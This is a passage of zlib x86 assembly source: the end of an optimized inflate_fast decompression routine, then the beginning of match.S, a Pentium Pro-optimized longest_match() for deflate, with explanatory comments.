orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
.L_get_distance_code:
movl dmask(%esp), %edx /* edx = dmask */
movl dcode(%esp), %ecx /* ecx = dcode */
andl hold_r, %edx /* edx &= hold */
movl (%ecx,%edx,4), %eax /* eax = dcode[hold & dmask] */
#define dist_r %edx
.L_dodist:
movl %eax, dist_r /* dist = this */
shrl $16, dist_r /* dist = this.val */
movb %ah, %cl
subb %ah, bits_r /* bits -= this.bits */
shrl %cl, hold_r /* hold >>= this.bits */
/* if (op & 16) {
* dist = this.val
* op &= 15
* if (op > bits) {
* hold |= *((unsigned short *)in)++ << bits;
* bits += 16
* }
* dist += hold & mask[op];
* bits -= op;
* hold >>= op;
*/
movb %al, %cl /* cl = this.op */
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist
andb $15, %cl /* op &= 15 */
jz .L_check_dist_one
cmpb %cl, bits_r
jae .L_add_bits_to_dist /* if (op <= bits) 97.6% */
movb %cl, %ch /* stash op in ch, freeing cl */
xorl %eax, %eax
lodsw /* al = *(ushort *)in++ */
movb bits_r, %cl /* cl = bits, needs it for shifting */
addb $16, bits_r /* bits += 16 */
shll %cl, %eax
orl %eax, hold_r /* hold |= *((ushort *)in)++ << bits */
movb %ch, %cl /* move op back to ecx */
.L_add_bits_to_dist:
movl $1, %eax
shll %cl, %eax
decl %eax /* (1 << op) - 1 */
subb %cl, bits_r
andl hold_r, %eax /* eax &= hold */
shrl %cl, hold_r
addl %eax, dist_r /* dist += hold & ((1 << op) - 1) */
jmp .L_check_window
.L_check_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* nbytes = out - beg;
* if (dist <= nbytes) {
* from = out - dist;
* do {
* PUP(out) = PUP(from);
* } while (--len > 0) {
* }
*/
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window /* if (dist > nbytes) 4.2% */
movl len(%esp), %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
.align 16,0x90
.L_check_dist_one:
cmpl $1, dist_r
jne .L_check_window
cmpl out_r, beg(%esp)
je .L_check_window
decl out_r
movl len(%esp), %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
jmp .L_while_test
.align 16,0x90
.L_test_for_second_level_length:
/* else if ((op & 64) == 0) {
* this = lcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl lcode(%esp), %edx /* edx = lcode */
movl (%edx,%eax,4), %eax /* eax = lcode[val + (hold&mask[op])] */
jmp .L_dolen
.align 16,0x90
.L_test_for_second_level_dist:
/* else if ((op & 64) == 0) {
* this = dcode[this.val + (hold & mask[op])];
* }
*/
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
movl $1, %eax
shll %cl, %eax
decl %eax
andl hold_r, %eax /* eax &= hold */
addl %edx, %eax /* eax += this.val */
movl dcode(%esp), %edx /* edx = dcode */
movl (%edx,%eax,4), %eax /* eax = dcode[val + (hold&mask[op])] */
jmp .L_dodist
.align 16,0x90
.L_clip_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes
*
* else {
* if (dist > wsize) {
* invalid distance
* }
* from = window;
* nbytes = dist - nbytes;
* if (write == 0) {
* from += wsize - nbytes;
*/
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = len
*
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define len_r %eax
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_wrap_around_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else if (write < nbytes) {
* from += wsize + write - nbytes;
* nbytes -= write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = window;
* nbytes = write;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while(--nbytes);
* from = out - dist;
* }
* }
* }
*/
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1
.L_contiguous_in_window:
/* regs: %esi = from, %ebp = hold, %bl = bits, %edi = out, %edx = dist
* %ecx = nbytes, %eax = write, %eax = len
*
* else {
* from += write - nbytes;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1:
/* regs: %esi = from, %esi = in, %ebp = hold, %bl = bits, %edi = out
* %eax = len
*
* while (len > 0) {
* PUP(out) = PUP(from);
* len--;
* }
* }
* } while (in < last && out < end);
*/
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
#undef len_r
#undef dist_r
#endif /* NO_MMX || RUN_TIME_MMX */
/*** MMX code ***/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
.align 32,0x90
.L_init_mmx:
emms
#undef bits_r
#undef bitslong_r
#define bitslong_r %ebp
#define hold_mm %mm0
movd %ebp, hold_mm
movl %ebx, bitslong_r
#define used_mm %mm1
#define dmask2_mm %mm2
#define lmask2_mm %mm3
#define lmask_mm %mm4
#define dmask_mm %mm5
#define tmp_mm %mm6
movd lmask(%esp), lmask_mm
movq lmask_mm, lmask2_mm
movd dmask(%esp), dmask_mm
movq dmask_mm, dmask2_mm
pxor used_mm, used_mm
movl lcode(%esp), %ebx /* ebx = lcode */
jmp .L_do_loop_mmx
.align 32,0x90
.L_while_test_mmx:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_length_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_length_code_mmx:
pand hold_mm, lmask_mm
movd lmask_mm, %eax
movq lmask2_mm, lmask_mm
movl (%ebx,%eax,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen_mmx:
movzbl %ah, %ecx /* ecx = this.bits */
movd %ecx, used_mm
subl %ecx, bitslong_r /* bits -= this.bits */
testb %al, %al
jnz .L_test_for_length_base_mmx /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test_mmx
.L_test_for_length_base_mmx:
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
testb $16, %al
jz .L_test_for_second_level_length_mmx /* if ((op & 16) == 0) 8% */
andl $15, %eax /* op &= 15 */
jz .L_decode_distance_mmx /* if (!op) */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm
movd hold_mm, %ecx
subl %eax, bitslong_r
andl .L_mask(,%eax,4), %ecx
addl %ecx, len_r /* len += hold & mask[op] */
.L_decode_distance_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_dist_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_dist_code_mmx:
movl dcode(%esp), %ebx /* ebx = dcode */
pand hold_mm, dmask_mm
movd dmask_mm, %eax
movq dmask2_mm, dmask_mm
movl (%ebx,%eax,4), %eax /* eax = dcode[hold & lmask] */
.L_dodist_mmx:
#define dist_r %ebx
movzbl %ah, %ecx /* ecx = this.bits */
movl %eax, dist_r
shrl $16, dist_r /* dist = this.val */
subl %ecx, bitslong_r /* bits -= this.bits */
movd %ecx, used_mm
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist_mmx
andl $15, %eax /* op &= 15 */
jz .L_check_dist_one_mmx
.L_add_bits_to_dist_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm /* save bit length of current op */
movd hold_mm, %ecx /* get the next bits on input stream */
subl %eax, bitslong_r /* bits -= op bits */
andl .L_mask(,%eax,4), %ecx /* ecx = hold & mask[op] */
addl %ecx, dist_r /* dist += hold & mask[op] */
.L_check_window_mmx:
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window_mmx /* if (dist > nbytes) 4.2% */
movl len_r, %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_check_dist_one_mmx:
cmpl $1, dist_r
jne .L_check_window_mmx
cmpl out_r, beg(%esp)
je .L_check_window_mmx
decl out_r
movl len_r, %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_test_for_second_level_length_mmx:
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
addl len_r, %ecx
movl (%ebx,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dolen_mmx
.align 16,0x90
.L_test_for_second_level_dist_mmx:
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
movl dcode(%esp), %eax /* ecx = dcode */
addl dist_r, %ecx
movl (%eax,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dodist_mmx
.align 16,0x90
.L_clip_window_mmx:
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window_mmx /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_wrap_around_window_mmx:
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window_mmx /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_contiguous_in_window_mmx:
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1_mmx:
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
#undef hold_r
#undef bitslong_r
#endif /* USE_MMX || RUN_TIME_MMX */
/*** USE_MMX, NO_MMX, and RUNTIME_MMX from here on ***/
.L_invalid_distance_code:
/* else {
* strm->msg = "invalid distance code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_distance_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_test_for_end_of_block:
/* else if (op & 32) {
* state->mode = TYPE;
* break;
* }
*/
testb $32, %al
jz .L_invalid_literal_length_code /* if ((op & 32) == 0) */
movl $0, %ecx
movl $INFLATE_MODE_TYPE, %edx
jmp .L_update_stream_state
.L_invalid_literal_length_code:
/* else {
* strm->msg = "invalid literal/length code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_literal_length_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_invalid_distance_too_far:
/* strm->msg = "invalid distance too far back";
* state->mode = BAD;
*/
movl in(%esp), in_r /* from_r has in's reg, put in back */
movl $.L_invalid_distance_too_far_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_update_stream_state:
/* set strm->msg = %ecx, strm->state->mode = %edx */
movl strm_sp(%esp), %eax
testl %ecx, %ecx /* if (msg != NULL) */
jz .L_skip_msg
movl %ecx, msg_strm(%eax) /* strm->msg = msg */
.L_skip_msg:
movl state_strm(%eax), %eax /* state = strm->state */
movl %edx, mode_state(%eax) /* state->mode = edx (BAD | TYPE) */
jmp .L_break_loop
.align 32,0x90
.L_break_loop:
/*
* Regs:
*
* bits = %ebp when mmx, and in %ebx when non-mmx
* hold = %hold_mm when mmx, and in %ebp when non-mmx
* in = %esi
* out = %edi
*/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_next_in
#endif /* RUN_TIME_MMX */
movl %ebp, %ebx
.L_update_next_in:
#endif
#define strm_r %eax
#define state_r %edx
/* len = bits >> 3;
* in -= len;
* bits -= len << 3;
* hold &= (1U << bits) - 1;
* state->hold = hold;
* state->bits = bits;
* strm->next_in = in;
* strm->next_out = out;
*/
movl strm_sp(%esp), strm_r
movl %ebx, %ecx
movl state_strm(strm_r), state_r
shrl $3, %ecx
subl %ecx, in_r
shll $3, %ecx
subl %ecx, %ebx
movl out_r, next_out_strm(strm_r)
movl %ebx, bits_state(state_r)
movl %ebx, %ecx
leal buf(%esp), %ebx
cmpl %ebx, last(%esp)
jne .L_buf_not_used /* if buf != last */
subl %ebx, in_r /* in -= buf */
movl next_in_strm(strm_r), %ebx
movl %ebx, last(%esp) /* last = strm->next_in */
addl %ebx, in_r /* in += strm->next_in */
movl avail_in_strm(strm_r), %ebx
subl $11, %ebx
addl %ebx, last(%esp) /* last = &strm->next_in[ avail_in - 11 ] */
.L_buf_not_used:
movl in_r, next_in_strm(strm_r)
movl $1, %ebx
shll %cl, %ebx
decl %ebx
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_hold
#endif /* RUN_TIME_MMX */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ebp
emms
.L_update_hold:
#endif /* USE_MMX || RUN_TIME_MMX */
andl %ebx, %ebp
movl %ebp, hold_state(state_r)
#define last_r %ebx
/* strm->avail_in = in < last ? 11 + (last - in) : 11 - (in - last) */
movl last(%esp), last_r
cmpl in_r, last_r
jbe .L_last_is_smaller /* if (in >= last) */
subl in_r, last_r /* last -= in */
addl $11, last_r /* last += 11 */
movl last_r, avail_in_strm(strm_r)
jmp .L_fixup_out
.L_last_is_smaller:
subl last_r, in_r /* in -= last */
negl in_r /* in = -in */
addl $11, in_r /* in += 11 */
movl in_r, avail_in_strm(strm_r)
#undef last_r
#define end_r %ebx
.L_fixup_out:
/* strm->avail_out = out < end ? 257 + (end - out) : 257 - (out - end)*/
movl end(%esp), end_r
cmpl out_r, end_r
jbe .L_end_is_smaller /* if (out >= end) */
subl out_r, end_r /* end -= out */
addl $257, end_r /* end += 257 */
movl end_r, avail_out_strm(strm_r)
jmp .L_done
.L_end_is_smaller:
subl end_r, out_r /* out -= end */
negl out_r /* out = -out */
addl $257, out_r /* out += 257 */
movl out_r, avail_out_strm(strm_r)
#undef end_r
#undef strm_r
#undef state_r
.L_done:
addl $local_var_size, %esp
popf
popl %ebx
popl %ebp
popl %esi
popl %edi
ret
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast,@function
.size inflate_fast,.-inflate_fast
#endif
|
AIFM-sys/AIFM
| 9,238
|
shenango/apps/parsec/pkgs/libs/zlib/src/contrib/asm686/match.S
|
/* match.s -- Pentium-Pro-optimized version of longest_match()
 * Written for zlib 1.1.2
 * Copyright (C) 1998 Brian Raiter <breadbox@muppetlabs.com>
 *
 * This is free software; you can redistribute it and/or modify it
 * under the terms of the GNU General Public License.
 */
/* NOTE(review): 32-bit x86, GNU as, AT&T syntax (op src, dst), cdecl
 * calling convention: arguments on the stack, result in %eax,
 * %ebx/%esi/%edi/%ebp callee-saved (and saved in the prologue below).
 */
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
/* All offsets below are relative to %esp after the prologue's
 * "subl $LocalVarsSize, %esp"; the saved registers and return address
 * sit above the locals, which is why deflatestate/curmatch start at 56.
 */
#define chainlenwmask 0 /* high word: current chain len */
/* low word: s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define scanstart 16 /* first two bytes of string */
#define scanend 12 /* last two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* All the +zlib1222add offsets are due to the addition of fields
 * in zlib in the deflate_state structure since the asm code was first written
 * (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
 * (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
 * if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
 */
/* NOTE(review): these are hard-coded byte offsets into deflate_state and
 * silently break if the struct layout changes -- keep in sync with deflate.h.
 */
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
/*
 * Finds the longest back-reference match for the string at
 * s->window + s->strstart, walking the s->prev hash chain from curmatch.
 *
 * In (stack, cdecl): deflatestate = deflate_state*, curmatch = IPos
 * Out:   %eax = best match length found, capped at s->lookahead
 * Side:  s->match_start is updated whenever a longer match is recorded
 * Regs:  %ecx holds cur_match for the whole function; other register
 *        roles are documented per phase below.
 */
longest_match:
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
pushl %ebp
pushl %edi
pushl %esi
pushl %ebx
subl $LocalVarsSize, %esp
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
movl deflatestate(%esp), %edx
movl curmatch(%esp), %ecx
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/*     chain_length >>= 2; */
/* } */
/* NOTE: the two movl's between cmpl and jl do not touch EFLAGS, so the */
/* jl still tests prev_length vs good_match -- deliberate scheduling. */
movl dsPrevLen(%edx), %eax
movl dsGoodMatch(%edx), %ebx
cmpl %ebx, %eax
movl dsWMask(%edx), %eax
movl dsMaxChainLen(%edx), %ebx
jl LastMatchGood
shrl $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
decl %ebx
shll $16, %ebx
orl %eax, %ebx
movl %ebx, chainlenwmask(%esp)
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch(%edx), %eax
movl dsLookahead(%edx), %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
movl dsWindow(%edx), %esi
movl %esi, window(%esp)
movl dsStrStart(%edx), %ebp
lea (%esi,%ebp), %edi
movl %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
movl %edi, %eax
negl %eax
andl $3, %eax
movl %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/*     s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize(%edx), %eax
subl $MIN_LOOKAHEAD, %eax
subl %eax, %ebp
jg LimitPositive
xorl %ebp, %ebp
LimitPositive:
/* int best_len = s->prev_length; */
movl dsPrevLen(%edx), %eax
movl %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in */
/* windowbestlen(%esp) on the stack. */
addl %eax, %esi
movl %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
movzwl (%edi), %ebx
movl %ebx, scanstart(%esp)
movzwl -1(%edi,%eax), %ebx
movl %ebx, scanend(%esp)
movl dsPrev(%edx), %edi
/* Jump into the main loop. */
movl chainlenwmask(%esp), %edx
jmp LoopEntry
.balign 16
/* do {
 * match = s->window + cur_match;
 * if (*(ushf*)(match+best_len-1) != scan_end ||
 * *(ushf*)match != scan_start) continue;
 * [...]
 * } while ((cur_match = prev[cur_match & wmask]) > limit
 * && --chain_length != 0);
 *
 * Here is the inner loop of the function. The function will spend the
 * majority of its time in this loop, and majority of that time will
 * be spent in the first ten instructions.
 *
 * Within this loop:
 * %ebx = scanend
 * %ecx = curmatch
 * %edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
 * %esi = windowbestlen - i.e., (window + bestlen)
 * %edi = prev
 * %ebp = limit
 */
LookupLoop:
andl %edx, %ecx
movzwl (%edi,%ecx,2), %ecx /* cur_match = prev[cur_match & wmask] */
cmpl %ebp, %ecx
jbe LeaveNow /* hit the distance limit: stop */
subl $0x00010000, %edx /* --chain_length (kept in the high word) */
js LeaveNow /* chain exhausted (sign-flag exit test) */
LoopEntry: movzwl -1(%esi,%ecx), %eax /* last two bytes of candidate match */
cmpl %ebx, %eax
jnz LookupLoop
movl window(%esp), %eax
movzwl (%eax,%ecx), %eax /* first two bytes of candidate match */
cmpl scanstart(%esp), %eax
jnz LookupLoop
/* Store the current value of chainlen. */
movl %edx, chainlenwmask(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
movl window(%esp), %esi
movl scan(%esp), %edi
addl %ecx, %esi
movl scanalign(%esp), %eax
movl $(-MAX_MATCH_8), %edx
lea MAX_MATCH_8(%edi,%eax), %edi
lea MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
 * adjust %edx so that it is offset to the exact byte that mismatched.
 *
 * We already know at this point that the first three bytes of the
 * strings match each other, and they can be safely passed over before
 * starting the compare loop. So what this code does is skip over 0-3
 * bytes, as much as necessary in order to dword-align the %edi
 * pointer. (%esi will still be misaligned three times out of four.)
 *
 * It should be confessed that this loop usually does not represent
 * much of the total running time. Replacing it with a more
 * straightforward "rep cmpsb" would not drastically degrade
 * performance.
 */
LoopCmps:
movl (%esi,%edx), %eax
xorl (%edi,%edx), %eax /* nonzero iff the two dwords differ */
jnz LeaveLoopCmps
movl 4(%esi,%edx), %eax
xorl 4(%edi,%edx), %eax
jnz LeaveLoopCmps4
addl $8, %edx
jnz LoopCmps
jmp LenMaximum
LeaveLoopCmps4: addl $4, %edx
LeaveLoopCmps: testl $0x0000FFFF, %eax
jnz LenLower
addl $2, %edx
shrl $16, %eax
/* subb/adcl pair: carry is set iff the low mismatch byte was zero, */
/* i.e. the mismatch is in the high byte -- bumps %edx by one more. */
LenLower: subb $1, %al
adcl $0, %edx
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%edi,%edx), %eax
movl scan(%esp), %edi
subl %edi, %eax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
cmpl %ebx, %eax
jg LongerMatch
movl windowbestlen(%esp), %esi
movl dsPrev(%edx), %edi
movl scanend(%esp), %ebx
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch: movl nicematch(%esp), %ebx
movl %eax, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
cmpl %ebx, %eax
jge LeaveNow
movl window(%esp), %esi
addl %eax, %esi
movl %esi, windowbestlen(%esp)
movzwl -1(%edi,%eax), %ebx /* %edi still = scan here: reload scan_end */
movl dsPrev(%edx), %edi
movl %ebx, scanend(%esp)
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
